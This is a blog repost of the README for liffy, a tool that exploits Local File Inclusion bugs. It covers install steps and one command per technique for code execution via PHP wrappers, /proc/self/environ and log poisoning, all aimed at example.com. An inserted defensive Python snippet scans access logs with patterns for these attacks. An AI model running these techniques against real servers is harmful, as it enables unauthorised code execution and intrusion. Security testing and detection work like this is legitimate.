Tools liffy | Local File Inclusion Exploitation Tools
Sunday, 16 June 2019
Nelo.F4 - Tools liffy | Local File Inclusion Exploitation Tools is a tool for finding LFI (Local File Inclusion) bugs in a website. Many of us are flocking to become bug hunters or anonymous white hats, but many of us also do not yet know about this useful tool, hehe. Let's go straight to the discussion without further delay.
Tools liffy v.2.0 is an improved version of the liffy tool created by rotlogix.
Main feature
- data:// for code execution
- expect:// for code execution
- input:// for code execution
- filter:// for arbitrary file reads
- /proc/self/environ for code execution in CGI mode
- Apache access.log poisoning
- Linux auth.log SSH poisoning
- Direct payload delivery with no stager
- Support for absolute and relative path traversal
- Support for cookies for authentication
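From the defender's side, each technique in this list leaves a recognizable marker in the request's query string. The following Python is an added example, not part of liffy or of the original post; the indicator names, function names and sample log lines are constructed for illustration. It flags access-log lines whose decoded query string references these wrappers or paths.

```python
import re
from urllib.parse import urlsplit, unquote

# One pattern per technique in the feature list (wrapper names as PHP spells them).
INDICATORS = {
    "data wrapper": re.compile(r"\bdata:", re.I),
    "expect wrapper": re.compile(r"\bexpect:", re.I),
    "php://input": re.compile(r"php://input", re.I),
    "php://filter": re.compile(r"php://filter", re.I),
    "/proc/self/environ": re.compile(r"/proc/self/environ"),
    "log file include": re.compile(r"/(auth|access)\.log\b"),
    "path traversal": re.compile(r"\.\./"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (Apache combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jun/2019:10:00:01 +0000] "GET /?id=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [16/Jun/2019:10:00:07 +0000] "GET /?id=php%3A%2F%2Ffilter%2Fresource%3Dindex HTTP/1.1" 200 90 "-" "python-requests"',
    '203.0.113.9 - - [16/Jun/2019:10:00:09 +0000] "GET /?id=%252e%252e%252f%252e%252e%252fvar/log/apache2/access.log HTTP/1.1" 200 90 "-" "python-requests"',
    '203.0.113.9 - - [16/Jun/2019:10:00:12 +0000] "GET /?id=/proc/self/environ HTTP/1.1" 200 90 "-" "python-requests"',
]

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return sorted indicator names found in the query string of one log line."""
    match = REQUEST.search(line)
    if not match:
        return []  # not a request line we understand
    query = decode(urlsplit(match.group(1)).query)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))

def scan(lines):
    """Map 1-based line number to its indicators, skipping clean lines."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := scan_line(line))}

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

An access log records only the request line, so request bodies and headers (used by the input:// and log poisoning techniques) need WAF or application-level logging to be visible.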
Installation
Clone the repository
$ git clone https://github.com/mzfr/liffy
Create a virtual environment
$ python -m venv <name-of-virtual-env>
Example:
$ python -m venv liffy
Activate the venv
$ source liffy/bin/activate
Install dependencies
$ pip install -r requirements.txt
NOTE! liffy uses msfvenom to generate PHP payloads, so you should already have Metasploit installed.
Usage
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a]
[-ns] [-r] [--ssh] [-l LOCATION] [--cookies COOKIES]
url
positional arguments:
url URL to test for LFI
optional arguments:
-h, --help show this help message and exit
-d, --data Use data:// technique
-i, --input Use input:// technique
-e, --expect Use expect:// technique
-f, --filter Use filter:// technique
-p, --proc Use /proc/self/environ technique
-a, --access access logs technique
-ns, --nostager execute payload directly, do not use stager
-r, --relative use path traversal sequences for attack
--ssh SSH auth log poisoning
-l LOCATION, --location LOCATION
path to the target file (access log, auth log, etc.)
--cookies COOKIES session cookies for authentication
Check the URL with data://
Option: -d or --data
Ex: python liffy.py http://example.com/?id= -d
Check the URL with input://
Option: -i or --input
Ex: python liffy.py http://example.com/?id= -i
Check the URL with expect://
Option: -e or --expect
Ex: python liffy.py http://example.com/?id= -e
Check the URL with filter://
Option: -f or --filter
Ex: python liffy.py http://example.com/?id= -f
Use /proc/self/environ for code execution
Option: -p or --proc
Ex: python liffy.py http://example.com/?id= -p
Using Apache access.log poisoning
Option: -a or --access
Ex: python liffy.py http://example.com/?id= -a
Using SSH auth.log poisoning
Option: --ssh
Ex: python liffy.py http://example.com/?id= --ssh
Relatively traverse directories
Option: -r
This option can be used along with the other options to traverse the directories relatively.
EX:
- python liffy.py http://example.com/?id= --ssh -r
- python liffy.py http://example.com/?id= -p -r
- python liffy.py http://example.com/?id= -a -r
Specify log path
Option: -l or --location
This option has to be used together with one of the log techniques (SSH auth log or Apache access log).
EX:
- python liffy.py http://example.com/?id= --ssh -l /var/auth.log
- python liffy.py http://example.com/?id= -a -l /var/apache2/access.log
By default the following locations are used:
For SSH auth.log - /var/log/auth.log
For apache2 access.log - /var/log/apache2/access.log
Author: mzfr
Thanks to mzfr - kitploit.com